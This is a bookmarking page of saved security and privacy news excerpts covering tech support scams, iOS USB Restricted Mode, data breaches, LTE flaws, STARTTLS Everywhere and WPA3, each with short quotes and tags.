New research shows that browser based Tech Support Scams are starting to utilize services normally found in legitimate call center operations. These services, called call optimization services, are typically used by call centers to perform call load balancing, call routing, dynamic generation of phone numbers, and more.
When a visitor accesses a browser-based tech support scam, the page typically uses some sort of behavior that makes it difficult to close. This could be a form that re-opens itself, displaying notification dialogs, entering full-screen mode, or a JavaScript routine that causes the page to become unresponsive.
This is done to scare a visitor into calling the listed phone numbers by keeping the scam on the screen without allowing it to be closed.
security  privacy  technology  support  scam 
12 days ago by rgl7194
Cyrillic Characters Are Favorites for IDN Homograph Attacks
Cyrillic (Russian alphabet) characters are the most common characters used in IDN homograph attacks, according to research published last month by Farsight Security.
IDN stands for internationalized domain name: a domain name spelled out using non-Latin characters, such as Cyrillic, Greek, Chinese, or Japanese letters.
IDN domains were introduced in 2010, but they have only started to catch on in recent years, as more website owners realized they could own a domain spelled in their native language.
But as the technology became more popular, so did its potential for abuse. One of the most common ways IDN support in browsers is being abused is for phishing attacks, where miscreants register websites that use Latin-looking non-Latin characters in an attempt to trick the user into thinking he's navigating to a legitimate website.
This is done by using "confusable" characters: letters from different alphabets that look the same. (The full list of Unicode confusable characters is published by the Unicode Consortium.)
URL  unicode  language  security  privacy  cyrillic 
12 days ago by rgl7194
Archive.org Has Created a Decentralized or Dweb Version of Their Site
The Internet Archive, or Archive.org, is a non-profit organization that stores snapshots of web pages and other media so that you can view them at different states in time even if they have been deleted or changed. Even though sites like Archive.org exist and content posted on the Internet is typically there forever, lawsuits, censorship, DDoS attacks, and Internet outages could cause content to be removed or become inaccessible.
For these reasons, Archive.org is testing a decentralized version, or DWeb version, of their web site that allows their content to be delivered over peer-to-peer connections, with different hosts sharing portions of, or all of, the same content. This decentralized version of Archive.org is running on the domain https://dweb.me/ or https://dweb.archive.org/ and uses a combination of HTTP and peer-to-peer protocols such as yjs, IPFS, WebTorrent, and GUN to deliver the content.
internet  archive  security  backup  p2p 
12 days ago by rgl7194
Ex-NSO Employee Caught Selling Stolen Phone Hacking Tool For $50 Million
A former employee of NSO Group, one of the world's most powerful hacking companies, has been arrested and charged with stealing phone hacking tools from the company and secretly trying to sell them for $50 million on the Darknet.
Israeli hacking firm NSO Group is mostly known for selling high-tech malware capable of remotely cracking into Apple's iPhones and Google's Android devices to intelligence apparatuses, militaries, and law enforcement around the world.
encryption  ios11  iphone  privacy  security  USB 
12 days ago by rgl7194
Anti-Hack Feature Comes to iOS 11.4.1… But Is It Good Enough? | The Mac Security Blog
Earlier this week, Apple released security updates for all of its major operating systems: macOS, iOS, watchOS, and tvOS.
Interestingly, iOS 11.4.1 includes a surprise: USB Restricted Mode—a somewhat controversial security feature that Apple describes in a separate support article.
What Is USB Restricted Mode?
USB Restricted Mode was first introduced in the iOS 12 beta at Apple's WWDC event in early June. (Related: Why iOS 12 Is Huge for Security and Privacy)
By default, iOS 12—and now iOS 11.4.1—purposely block access to USB devices connected to an iPhone after it has been locked for at least one hour, or if the phone has been put into Emergency SOS mode. After one of those conditions has been met, connecting a device to the Lightning port requires unlocking the phone before the connected device will work.
encryption  ios11  iphone  privacy  security  USB 
12 days ago by rgl7194
USB restricted mode: now you don’t see it, now you do… | Mac Virus
Graham Cluley: New iOS security feature can be defeated by a $39 adapter… sold by Apple – “Unfortunately for Apple, and customers who like to believe that their phone is private, a workaround has been discovered whereby police could prevent an iPhone or iPad entering USB Restricted Mode if they act quickly enough … Researchers at Elcomsoft discovered that the one hour countdown timer can be reset simply by connecting the iPhone to an untrusted USB accessory.” Further commentary from Pierluigi Paganini: Just using a $39 device it is possible to defeat new iOS USB Restricted Mode.
encryption  ios11  iphone  privacy  security  USB 
12 days ago by rgl7194
USB Accessory Can Defeat iOS's New "USB Restricted Mode" Security Feature
With the release of iOS 11.4.1, Apple has finally rolled out a new security feature designed to protect your devices against USB accessories that connect to the data port, making it harder for law enforcement and hackers to break into your iPhone or iPad without your permission.
Dubbed USB Restricted Mode, the feature automatically disables data connection capabilities of the Lightning port on your iPhone or iPad if the device has been locked for an hour or longer, while the port can still be used for device charging.
In other words, every time you lock your iPhone, a countdown timer of an hour gets activated in the background which, if it completes, enables USB Restricted Mode to prevent unauthorized access to the data port.
encryption  ios11  iphone  privacy  security  USB 
12 days ago by rgl7194
Timehop Hacked — Hackers Stole Personal Data Of All 21 Million Users
And the hacks just keep on coming.
Timehop social media app has been hit by a major data breach on July 4th that compromised the personal data of its more than 21 million users.
Timehop is a simple social media app that collects your old photos and posts from your iPhone, Facebook, Instagram, Twitter and Foursquare and acts as a digital time machine to help you find what you were doing on this very day exactly a year ago.
The company revealed on Sunday that unknown attacker(s) managed to break into its cloud computing environment and access the data of its entire 21 million users, including their names, email addresses, and approximately 4.7 million phone numbers attached to their accounts.
"We learned of the breach while it was still in progress, and were able to interrupt it, but data was taken. Some data was breached," the company wrote in a security advisory posted on its website.
social_media  apps  security  privacy  breach  data  hack 
12 days ago by rgl7194
Timehop Security Breach Affects the Company’s Entire 21 Million Userbase
Timehop, a mobile app that surfaces old social media posts from the same day but from previous years, has announced a security breach affecting its entire userbase of over 21 million users.
Not all users were affected to the same extent. The company said a hacker gained access to its infrastructure and stole details on its users that included usernames, emails, telephone numbers, and access keys.
social_media  apps  security  privacy  breach  data  hack 
12 days ago by rgl7194
Eight AT&T Buildings and Ten Years of Litigation: Shining a Light on NSA Surveillance | Electronic Frontier Foundation
Two reporters recently identified eight AT&T locations in the United States—towering, multi-story buildings—where NSA surveillance occurs on the backbone of the Internet. Their article showed how the agency taps into cables, routers, and switches that handle vast quantities of Internet traffic around the world. Published by The Intercept, the report shines a light on the NSA’s expansive Internet surveillance network housed inside these sometimes-opaque buildings.
EFF has been shining its own light on NSA Internet surveillance for years with our landmark case, Jewel v. NSA. In more than 10 years of litigation, we’ve made significant strides.
internet  privacy  security  gov2.0  NSA  spying  EFF 
12 days ago by rgl7194
Between You, Me, and Google: Problems With Gmail's “Confidential Mode” | Electronic Frontier Foundation
With Gmail’s new design rolled out to more and more users, many have had a chance to try out its new “Confidential Mode.” While many of its features sound promising, what “Confidential Mode” provides isn’t confidentiality. At best, the new mode might create expectations that it fails to meet around security and privacy in Gmail. We fear that Confidential Mode will make it less likely for users to find and use other, more secure communication alternatives. And at worst, Confidential Mode will push users further into Google’s own walled garden while giving them what we believe are misleading assurances of privacy and security.
With its new Confidential Mode, Google purports to allow you to restrict how the emails you send can be viewed and shared: the recipient of your Confidential Mode email will not be able to forward or print it. You can also set an “expiration date” at which time the email will be deleted from your recipient’s inbox, and even require a text message code as an added layer of security before the email can be viewed.
Unfortunately, each of these “security” features comes with serious security problems for users.
email  gmail  security  privacy  DRM 
12 days ago by rgl7194
How an Ex-Cop Rigged McDonald’s Monopoly Game and Stole Millions
Jerome Jacobson and his network of mobsters, psychics, strip-club owners, and drug traffickers won almost every prize for 12 years, until the FBI launched Operation ‘Final Answer.’
On Aug. 3, 2001, a McDonald’s film crew arrived in the bustling beach town of Westerly, Rhode Island. They carried their cameras and a giant cashier’s check to a row of townhouses, and knocked on the door of Michael Hoover. The 56-year-old bachelor had called a McDonald’s hotline to say he’d won their Monopoly competition. Since 1987, McDonald’s customers had feverishly collected Monopoly game pieces attached to drink cups, french fry packets, and advertising inserts in magazines. By completing groups of properties like Baltic and Mediterranean Avenues, players won cash or a Sega Game Gear, while “Instant Win” game pieces scored a free Filet-O-Fish or a Jamaican vacation. But Hoover, a casino pit boss who had recently filed for bankruptcy, claimed he’d won the grand prize–$1 million.
security  privacy  contest  crime  restaurants 
12 days ago by rgl7194
Hacking the McDonald's Monopoly Sweepstakes - Schneier on Security
Long and interesting story -- now two decades old -- of massive fraud perpetrated against the McDonald's Monopoly sweepstakes. The central fraudster was the person in charge of securing the winning tickets.
security  privacy  contest  crime  restaurants 
12 days ago by rgl7194
Russians Are Targeting Private Election Companies, Too — And States Aren’t Doing Much About It | FiveThirtyEight
The American election system is a textbook example of federalism at work. States administer elections, and the federal government doesn’t have much say in how they do it. While this decentralized system has its benefits, it also means that there’s no across-the-board standard for election system cybersecurity practices. This lack of standardization has become all the more apparent over the past two years: Hackers probed 21 state systems during the lead-up to the 2016 election and gained access to one. But the federal government and states don’t appear to have made great strides to ensure that this doesn’t happen again. To do so, they’d need to deal with not only their own cybersecurity deficits but also those of the private companies that help states administer elections.
Voting machine manufacturers and the makers of election software and electronic poll books (which are lists of eligible voters) are crucially intertwined with state election systems. All states, to some extent or another, rely on these private companies for election products. But despite the central role these companies play, state regulations of them are relatively lax. That’s a problem, especially at a time when these companies are, along with state governments, targets of foreign agents of chaos.
election  gov2.0  politics  state  hack  russia  security  privacy  538 
12 days ago by rgl7194
New Rules to Protect Data Privacy: Where to Focus, What to Avoid | Electronic Frontier Foundation
For many years, EFF has urged technology companies and legislators to do a better job at protecting the privacy of technology users and other members of the public. We hoped the companies, particularly mature players, would realize the importance of implementing meaningful privacy protections. But this year’s Cambridge Analytica scandal, following on the heels of many others, was the last straw.  Corporations are willfully failing to respect the privacy of technology users, and we need new approaches to give them real incentives to do better—and that may include updating our privacy laws.
To be clear, any new regulations must be judicious and narrowly tailored, avoiding tech mandates and expensive burdens that would undermine competition—already a problem in some tech spaces. To accomplish that, policymakers must start by consulting with technologists as well as lawyers.  After the passage of SESTA/FOSTA, we know Congress can be insensitive about the potential consequences of the rules it embraces. Looking to experts would help.
EFF  data  privacy  security  opt-in  sharing  breach  gov2.0 
13 days ago by rgl7194
Explained: What is big data? - Malwarebytes Labs | Malwarebytes Labs
If the pile of manure is big enough, you will find a gold coin in it eventually. This saying is used often to explain why anyone would use big data. Needless to say, in this day and age, the piles of data are so big, you might end up finding a pirate’s treasure.
How big is the pile?
But when is the pile big enough to consider it big data? Per Wikipedia:
“Big data is data sets that are so big and complex that traditional data-processing application software are inadequate to deal with them.”
As a consequence, we can say that it's not just the size that matters, but also the complexity of a dataset. The draw of big data to researchers and scientists, however, is not in its size or complexity, but in how it may be computationally analyzed to reveal patterns, trends, and associations.
When it comes to big data, no mountain is high enough or too difficult to climb. The more data we have to analyze, the more relevant conclusions we may be able to derive. If a dataset is large enough, we can start making predictions about how certain relationships will develop in the future and even find relationships we never suspected to exist.
big_data  data  business  security  privacy 
13 days ago by rgl7194
How Smart TVs in Millions of U.S. Homes Track More Than What’s On Tonight - The New York Times
The growing concern over online data and user privacy has been focused on tech giants like Facebook and devices like smartphones. But people’s data is also increasingly being vacuumed right out of their living rooms via their televisions, sometimes without their knowledge.
In recent years, data companies have harnessed new technology to immediately identify what people are watching on internet-connected TVs, and then use that information to send targeted advertisements to other devices in their homes. Marketers, forever hungry to get their products in front of the people most likely to buy them, have eagerly embraced such practices. But the companies watching what people watch have also faced scrutiny from regulators and privacy advocates over how transparent they are being with users.
tv  privacy  security  smart_home  spying  tracking  data 
21 days ago by rgl7194
Daring Fireball: iOS Devices Can Be Blocked From Entering USB Restricted Mode
Oleg Afonin, writing for the ElcomSoft blog:
What we discovered is that iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before (well, in fact the accessories do not require pairing at all). In other words, once the police officer seizes an iPhone, he or she would need to immediately connect that iPhone to a compatible USB accessory to prevent USB Restricted Mode lock after one hour. Importantly, this only helps if the iPhone has still not entered USB Restricted Mode.
Most (if not all) USB accessories fit the purpose — for example, Lightning to USB 3 Camera Adapter from Apple.
They think this might be tricky for Apple to fix:
Can Apple change it in future versions of iOS? To us, it seems highly unlikely simply because of the humongous amount of MFi devices that aren’t designed to support such a change. Theoretically, iOS could remember which devices were connected to the iPhone, and only allow those accessories to establish connectivity without requiring an unlock — but that’s about all we can think of.
encryption  ios11  iphone  privacy  security  USB  daring_fireball 
21 days ago by rgl7194
Introducing: Malwarebytes Browser Extension - Malwarebytes Labs | Malwarebytes Labs
Are you tired of all the unwanted content the world wide web offers up, whether you like it or not? It is our privilege to introduce you to the Malwarebytes Browser Extension (BETA). Or, better said, the Malwarebytes Browser Extensions, because we have one for Firefox and one for Chrome.
Malwarebytes Browser Extension delivers a safer and faster web browsing experience. It blocks malicious websites and filters out unwanted content (resulting in up to three times faster webpage load times). The filtering is not based on definitions, so the extensions can block previously-unidentified fake tech support scams and their tactics.
What will it do for your browsing experience? It prevents pop-ups, browser hijackers, and browser lockers from harassing you and interrupting your surfing. It also blocks clickbait links and fake news content, stops in-browser cryptocurrency miners, and gives other malicious content the boot. All this while relying on threat behavior patterns rather than on researchers who have to track down, identify the malware, and add it to a database of known threats. (We still need those researchers to make our products better. This is just a different, faster method.)
Speaking of behavior patterns, our browser extension is the first that heuristically identifies and blocks tech support scams’ browser-locker pages, which scare users into calling fake tech support scammers. So it protects you from unwanted social engineering tactics as well.
browser  plugins  chrome  firefox  security  privacy  malware 
23 days ago by rgl7194
Senator Asks US Government to Remove Flash From Federal Sites, Computers
In a letter sent today, Oregon Senator Ron Wyden asked officials from three government agencies to come up with solutions and procedures that mandate the removal of Adobe Flash content from all US government websites by August 1, 2019.
The Senator is urging US government officials to act in light of Adobe's Flash end-of-life date scheduled for the end of 2020, after which Adobe announced it would cease to provide any technical support for the software.
flash  congress  security  privacy  web2.0  gov2.0 
25 days ago by rgl7194
Defeating the iPhone Restricted Mode - Schneier on Security
Recently, Apple introduced restricted mode to protect iPhones from attacks by companies like Cellebrite and Grayshift, which allow attackers to recover information from a phone without the password or fingerprint. Elcomsoft just announced that it can easily bypass it.
There is an important lesson in this: security is hard. Apple Computer has one of the best security teams on the planet. This feature was not tossed out in a day; it was designed and implemented with a lot of thought and care. If this team could make a mistake like this, imagine how bad a security feature is when implemented by a team without this kind of expertise.
This is the reason actual cryptographers and security engineers are very skeptical when a random company announces that their product is "secure." We know that they don't have the requisite security expertise to design and implement security properly. We know they didn't take the time and care. We know that their engineers think they understand security, and designed to a level that they couldn't break.
Getting security right is hard for the best teams in the world. It's impossible for average teams.
ios11  iphone  privacy  security  USB  encryption 
27 days ago by rgl7194
USB restricted mode, plus Calisto Trojan | Mac Virus
1, Following up this story: USB restricted mode: now you don’t see it, now you do…
Elcomsoft’s claims hinged on the assertion that “…iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before…Most (if not all) USB accessories fit the purpose — for example, Lightning to USB 3 Camera Adapter from Apple.”
Andrew O’Hara, for AppleInsider, tells us that iOS 12 developer beta 4 requires device to be unlocked before connecting any USB accessories. “In the fourth developer beta of iOS 12, a passcode is required any time a computer or USB accessory is connected…Before the change, authorities or criminals would have an hour since last unlock to connect a cracking device, like the GreyKey box. Now, they don’t have that hour, making it that much more difficult to brute force a password attempt into a device.”
ios12  iphone  privacy  security  USB  encryption 
27 days ago by rgl7194
iOS 12 developer beta 4 requires device to be unlocked before connecting any USB accessories
Your iPhone's Lightning port will be even more locked down come iOS 12, which adds an additional layer of security in the fourth developer beta.
The change in the latest beta of iOS 12 is building on USB Restricted Mode which disables the Lightning port of an iOS device one hour after last being unlocked. The Lightning port could still be used for charging, but no accessories would be able to function until unlocked.
In the fourth developer beta of iOS 12, a passcode is required any time a computer or USB accessory is connected.
Before the change, authorities or criminals would have an hour since last unlock to connect a cracking device, like the GreyKey box. Now, they don't have that hour, making it that much more difficult to brute force a password attempt into a device.
ios12  iphone  privacy  security  USB  encryption 
27 days ago by rgl7194
Daring Fireball: iOS 12 Beta 4 Requires Device to Be Unlocked Before Connecting Any USB Accessories
Andrew O’Hara, AppleInsider:
The change in the latest beta of iOS 12 is building on USB Restricted Mode which disables the Lightning port of an iOS device one hour after last being unlocked. The Lightning port could still be used for charging, but no accessories would be able to function until unlocked.
In the fourth developer beta of iOS 12, a passcode is required any time a computer or USB accessory is connected.
Before the change, authorities or criminals would have an hour since last unlock to connect a cracking device, like the GreyKey box. Now, they don’t have that hour, making it that much more difficult to brute force a password attempt into a device.
So much for this loophole being hard for Apple to close.
ios12  iphone  privacy  security  USB  encryption  daring_fireball 
27 days ago by rgl7194
Companies with data breaches in 2018 - Business Insider
At least 15 retailers were hacked and likely had information stolen from them since January 2017.
Many of these were caused by flaws in payment systems taken advantage of by hackers.
At least 15 separate security breaches occurred at retailers from January 2017 until now. Many of them were caused by flaws in payment systems, either online or in stores.
Data breaches are on the rise for both retailers and other businesses. According to Business Insider Intelligence, data breaches are a real danger for both brands and customers, and they can affect a customer's trust in brands.
According to a study by KPMG, 19% of consumers would completely stop shopping at a retailer after a breach, and 33% would take a break from shopping there for an extended period.
Here are 15 retailers that have been affected by data breaches since January 2017...
breach  data  security  privacy  store  credit_cards 
5 weeks ago by rgl7194
Apple releases iOS 11.4.1 and blocks passcode cracking tools used by police - The Verge
Apple today released iOS 11.4.1, and while most of us are already looking ahead to all the new stuff coming in iOS 12, this small update contains an important new security feature: USB Restricted Mode. Apple has added protections against the USB devices being used by law enforcement and private companies that connect over Lightning to crack an iPhone’s passcode and evade Apple’s usual encryption safeguards.
If you go to Settings and check under Face ID (or Touch ID) & Passcode, you’ll see a new toggle for USB Accessories. By default, the switch is off. This means that once your iPhone or iPad has been locked for over an hour straight, iOS will no longer allow USB accessories to connect to the device — shutting out cracking tools like GrayKey as a result. If you’ve got accessories that you want to continue working after your iPhone has been sitting locked for a while, you can toggle the option on to remove the hour limit.
Apple’s wording is a bit confusing. You should leave the toggle disabled if you want your iPhone to be most secure.
iphone  security  privacy  ios11  USB 
5 weeks ago by rgl7194
Daring Fireball: iOS 11.4.1 Blocks USB Passcode Cracking Tools
Chris Welch, writing for The Verge:
Apple today released iOS 11.4.1, and while most of us are already looking ahead to all the new stuff coming in iOS 12, this small update contains an important new security feature: USB Restricted Mode. Apple has added protections against the USB devices being used by law enforcement and private companies that connect over Lightning to crack an iPhone’s passcode and evade Apple’s usual encryption safeguards.
Great news and an elegant solution.
iphone  security  privacy  ios11  USB  daring_fireball 
5 weeks ago by rgl7194
Apple releases iOS 11.4.1 with USB Restricted Mode | Ars Technica
The iOS update also fixes bugs with AirPods and Exchange mail servers.
As usual, this iOS release also includes security updates. However, Apple had not released the details on its security page at the time of this posting, but expect them to appear sometime soon. Significant but not listed: USB Restricted Mode, a change originally included in the iOS 12 beta that makes it more difficult for anyone, including authorities, to break into the iPhone through the Lightning port.
You'll now find a toggle switch labeled "USB Accessories" in the Touch ID & Passcode section of the Settings app. It's off by default. A caption explains:
Unlock iPhone to allow USB accessories to connect when it has been more than an hour since your iPhone was unlocked.
At first we thought we would have to wait until iOS 12 this fall to see this feature, but here it is.
iphone  security  privacy  ios11  USB 
5 weeks ago by rgl7194
How to use USB Restricted Mode on your iPhone or iPad
USB Restricted Mode brings a little extra security to your iPhone or iPad. Here's how you enable it.
While Apple has been testing it since the later beta versions of iOS 11.4, with the release of iOS 11.4.1, USB Restricted Mode is now available to the iPhone-using public at large. This new mode, which is buried under your passcode settings, adds additional security to your iOS device by preventing USB accessories from connecting to your iPhone or iPad if the device has been locked for more than one hour.
Recently, we've seen the emergence of a number of devices, including the GrayBox, that allow third parties to gather data from your iPhone or iPad through the Lightning port without having to unlock your device beforehand. While these devices are ostensibly designed for law enforcement, they are still taking advantage of a security hole that anyone could theoretically exploit. This means that Apple has a responsibility to plug this particular hole, despite the protestations of law enforcement.
iphone  security  privacy  ios11  USB 
5 weeks ago by rgl7194
Plant Your Flag, Mark Your Territory — Krebs on Security
Many people, particularly older folks, proudly declare they avoid using the Web to manage various accounts tied to their personal and financial data — including everything from utilities and mobile phones to retirement benefits and online banking services. The reasoning behind this strategy is as simple as it is alluring: What’s not put online can’t be hacked. But increasingly, adherents to this mantra are finding out the hard way that if you don’t plant your flag online, fraudsters and identity thieves may do it for you.
The crux of the problem is that while most types of customer accounts these days can be managed online, the process of tying one’s account number to a specific email address and/or mobile device typically involves supplying personal data that can easily be found or purchased online — such as Social Security numbers, birthdays and addresses.
security  privacy  banking  krebs  taxes  mail  SSN  credit_cards  credit_freeze  seniors 
7 weeks ago by rgl7194
Dear Customer: Your Secret is(n’t) Safe with Me - Pindrop
“Secrets-based” authentication based on your customers’ static PII alone is, today, useless.
With the addition of another massive data breach earlier this week, of over 340M individual records of consumers and businesses (with consumer profiles and preferences) from a market data aggregation firm, consumers’ secrets are now fully exposed.
Identifying data like the number of children you have, their gender, dog or cat ownership, smoking preference, and scuba certification, as well as the typical identifying data like name, address, birth date, and phone numbers, are no longer secret.
data  safety  security  privacy  business  breach  authentication 
7 weeks ago by rgl7194
Security Flaws Disclosed in LTE (4G) Mobile Telephony Standard
A team of academics published research yesterday that describes three attacks against the mobile communication standard LTE (Long-Term Evolution), also known as 4G.
Two of the three attacks are passive, meaning an attacker can watch LTE traffic and determine various details about the target, while the third is an active attack that lets the attacker manipulate data sent to the user's LTE device.
According to the researchers, the first passive attack allows an attacker to collect meta-information about the user's traffic (an identity mapping attack), while the second allows the attacker to determine what websites a user might be visiting through their LTE device (a website fingerprinting attack).
cellphones  LTE  security  privacy  hack 
7 weeks ago by rgl7194
Researchers Uncover New Attacks Against LTE Network Protocol
If your mobile carrier offers LTE, also known as the 4G network, you need to beware as your network communication can be hijacked remotely.
A team of researchers has discovered some critical weaknesses in the ubiquitous LTE mobile device standard that could allow sophisticated hackers to spy on users' cellular networks, modify the contents of their communications, and even re-route them to malicious or phishing websites.
LTE, or Long Term Evolution, is the latest mobile telephony standard, used by billions of people and designed to bring many security improvements over the predecessor standard known as Global System for Mobile (GSM) communications.
However, multiple security flaws have been discovered over the past few years, allowing attackers to intercept users' communications, spy on phone calls and text messages, send fake emergency alerts, spoof the location of the device, and knock devices entirely offline.
cellphones  LTE  security  privacy  hack 
7 weeks ago by rgl7194
Hackers Could Bypass macOS Signature Checks for A Decade - SecureMac
Code signing is one of the most important lines of defense against malware. It allows a user to know that the software they intend to install or run came from a trusted source, such as Apple, or another trusted developer. While code signing is not a 100% foolproof method, since some malware authors will burn legitimate developer IDs to sign their code, it’s generally a very strong safety feature. Code signed by Apple would be considered especially trustworthy, since no one would be able to spoof Apple’s private key. As it turns out, hackers have relied on this inherent trust to exploit poor security implementations in a wide-ranging number of third-party security apps.
Since the 2007 release of OS X Leopard, it seems that confusing language in Apple’s API documentation led many developers, including those of the Little Snitch Firewall, to improperly implement code signing verification. The exploit was surprisingly simple and relied on the Universal file format Apple uses to allow some applications to run on different types of Macs. By bundling together several code binaries in one package and including Apple-signed code at the top, these third-party security applications would read the entire bundle as signed by Apple.
mac  security  privacy  bug  apps  malware 
7 weeks ago by rgl7194
Bypassing Passcodes in iOS - Schneier on Security
Last week, a story was going around explaining how to brute-force an iOS passcode. Basically, the trick was to plug the phone into an external keyboard and try every PIN at once:
We reported Friday on Hickey's findings, which claimed to be able to send all combinations of a user's possible passcode in one go, by enumerating each code from 0000 to 9999, and concatenating the results in one string with no spaces. He explained that because this doesn't give the software any breaks, the keyboard input routine takes priority over the device's data-erasing feature.
I didn't write about it, because it seemed too good to be true. A few days later, Apple pushed back on the findings -- and it seems that it doesn't work.
ios  passwords  security  privacy  hack 
7 weeks ago by rgl7194
EFF Launches Encryption Initiative for Email Domains Named STARTTLS Everywhere
The Electronic Frontier Foundation (EFF) announced a new project named STARTTLS Everywhere that aims to provide guidance to server administrators on how to set up a proper email server that runs STARTTLS the correct way.
STARTTLS Everywhere is eerily similar to Let's Encrypt, another pro-encryption initiative the EFF launched together with Mozilla and Cisco two years ago.
But this initiative aims to bring encrypted communications to email servers, instead of web servers (Let's Encrypt's purpose).
EFF  email  encryption  privacy  security 
7 weeks ago by rgl7194
Some Spectre In-Browser Mitigations Can Be Defeated
Some of the protections against the Spectre CPU vulnerability introduced in modern browsers can be defeated, security researchers revealed this week.
According to research published by Aleph Security on Tuesday, the company's researchers were able to put together proof-of-concept code that retrieves sensitive data from a browser's protected memory.
The browsers were running a version that received mitigations against such attacks, researchers said.
The Aleph team says their PoC bypassed Spectre mitigations and retrieved data from browsers such as Edge, Chrome, and Safari. They were not able to retrieve browser memory data from Firefox, mainly because of a different type of mitigation Mozilla had used for its browser.
browser  bug  cpu  javascript  linux  mac  meltdown_spectre  privacy  security  windows 
7 weeks ago by rgl7194
Internet Safety Month: How to manage your child's online presence - Malwarebytes Labs | Malwarebytes Labs
When you hear the term “reputation risk management,” you might think of a buzzword used in the business sector. Reputation risk management is a term used to describe how companies identify potential risks that may harm their reputation and mitigate them before they blow up.
As companies grow, so grows their public reputation. Heading potential PR disasters or credible crises off at the pass can keep organizations from losing revenue, confidence, and trust from their clients. Suffice it to say, putting your best foot forward and keeping it there is crucial.
Now, here’s a thought: If businesses know they have much to lose if their reputation is threatened, shouldn’t parents and guardians also consider that their children can lose out if their digital footprint is at risk?
To cap off Internet Safety Month, we’re going to ditch the buzzword in favor of a phrase that parents, teens, and young kids can easily grasp: You must manage your online presence. Before we delve into how parents and guardians can take charge, it is crucial that we first understand one thing when it comes to having a digital life...
internet  safety  children  security  privacy  reputation  google 
7 weeks ago by rgl7194
Equifax Engineer Who Designed Breach Website Charged With Insider Trading
The US Securities and Exchange Commission (SEC) has indicted a former Equifax engineer on charges of insider trading.
According to court documents, Sudhakar Reddy Bonthu, 44, of Cumming, Georgia, worked for Equifax between September 2003 and March 2018.
Starting September 2013, Bonthu worked as Production Development Manager of Software Engineering in Equifax's Global Consumer Solutions (GCS) business unit. Bonthu's job involved creating software for Equifax's internal use, but also for its clients.
breach  credit_report  data  equifax  gov2.0  hack  identity_theft  legal  privacy  security  crime 
7 weeks ago by rgl7194
Terrifying Spam Call Leaves Voicemail Phishing for iCloud Logins | The Mac Security Blog
Have you received a weird spam call or voicemail claiming to be from Apple support, notifying you of suspicious activity with your Apple iCloud ID? The computer-generated recording may even sound terrifying to some victims, and its goal is to snare you into giving up your iCloud ID and password as part of a new phishing campaign.
Phishing scams targeting Apple IDs and passwords are not new, ranging from text message scams to clever phishing websites, but what appears to be making headway is a new method of calling your iPhone in an attempt to trick you into giving up your secret information. What's happening is you'll receive a call from a random or unknown number, such as 646-434-5603 or 844-282-0419, and if you don't pick up, the scammer or hacking group will even leave a voicemail phishing for your iCloud ID and password.
security  privacy  icloud  scam  phishing  social_engineering 
7 weeks ago by rgl7194
A Technical Deep Dive into STARTTLS Everywhere | Electronic Frontier Foundation
Today we’re announcing the launch of STARTTLS Everywhere, EFF’s initiative to improve the security of the email ecosystem.
Thanks to previous EFF efforts like Let's Encrypt, and Certbot, as well as help from the major web browsers, we've seen significant wins in encrypting the web. Now we want to do for email what we’ve done for web browsing: make it simple and easy for everyone to help ensure their communications aren’t vulnerable to mass surveillance.
Note that this is a technical deep dive into EFF’s new STARTTLS Everywhere project, which assumes familiarity with SMTP and STARTTLS. If you’re not familiar with those terms, you should first read our post intended for a general audience, available here.
email  security  privacy  EFF  encryption 
7 weeks ago by rgl7194
Announcing STARTTLS Everywhere: Securing Hop-to-Hop Email Delivery | Electronic Frontier Foundation
Today we’re announcing the launch of STARTTLS Everywhere, EFF’s initiative to improve the security of the email ecosystem.
Thanks to previous EFF efforts like Let's Encrypt, and Certbot, as well as help from the major web browsers, we've seen significant wins in encrypting the web. Now we want to do for email what we’ve done for web browsing: make it simple and easy for everyone to help ensure their communications aren’t vulnerable to mass surveillance.
email  security  privacy  EFF  encryption 
7 weeks ago by rgl7194
WPA3 Standard Officially Launches With New Wi-Fi Security Features
The Wi-Fi Alliance today officially launched WPA3—the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks in use today, including the dangerous KRACK attacks.
WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended to prevent hackers from eavesdropping on your wireless data.
However, late last year, security researchers uncovered a severe flaw in the current WPA2 protocol, dubbed KRACK (Key Reinstallation Attack), that made it possible for attackers to intercept, decrypt and even manipulate WiFi network traffic.
Although most device manufacturers patched their devices against KRACK attacks, the WiFi Alliance, without much delay, rushed to finalize and launch WPA3 in order to address WPA2's technical shortcomings from the ground up.
wi-fi  security  privacy  standards 
7 weeks ago by rgl7194
New WPA3 Wi-Fi Standard Released
On Monday, the Wi-Fi Alliance, the organization that manages Wi-Fi technologies, announced the official release of WPA3.
WPA3 is the latest version of Wi-Fi Protected Access (WPA), a user authentication technology for Wi-Fi connections.
News that the Wi-Fi Alliance was working on WPA3 leaked online in January. The organization started working on WPA3 after a security researcher revealed KRACK, a vulnerability in the WPA2 WiFi protocol that made it somewhat trivial for an attacker to gain access to WiFi transmissions protected by WPA2.
WPA3 is currently optional for all newly produced devices, but it will become the de-facto Wi-Fi authentication standard for all Wi-Fi capable devices in the coming years. A date has not been set yet, but the new WPA3 will retain interoperability with older WPA2 devices to ensure as little friction as possible during the transition to WPA3.
wi-fi  security  privacy  standards 
7 weeks ago by rgl7194
WPA3 Wi-Fi security standard is officially rolling out to replace the 14-year-old WPA2 | iMore
The new standard wants to make your Wi-Fi network more secure than it's ever been.
As our mobile world progresses with new phones, smart home gadgets, and more, it's becoming even more critical that our online presence is as safe and secure as can be. To ensure things stay that way, the Wi-Fi Alliance is now certifying products that support the new WPA3 standard.
WPA3 is officially replacing WPA2, and considering that WPA2 was first released in 2004, the time for this is long overdue. Although not much is changing from a consumer point-of-view, WPA3 is chock-full of new features and tools to ensure your wireless internet connection is more secure than ever before.
One of the highlights found with WPA3 is that it makes it much more difficult for hackers to tap into your network using offline password-guessing attacks. WPA2 allows deviants to capture data from your router and then repeatedly guess your password over and over on their computer so they can gain access to your Wi-Fi setup, but with WPA3, one incorrect hacking attempt will render this data useless.
wi-fi  security  privacy  standards 
7 weeks ago by rgl7194
Ex-Senate Aide Charged in Leak Case Where Times Reporter’s Records Were Seized - The New York Times
WASHINGTON — A former Senate Intelligence Committee aide was arrested on Thursday in an investigation of classified information leaks where prosecutors also secretly seized years’ worth of a New York Times reporter’s phone and email records.
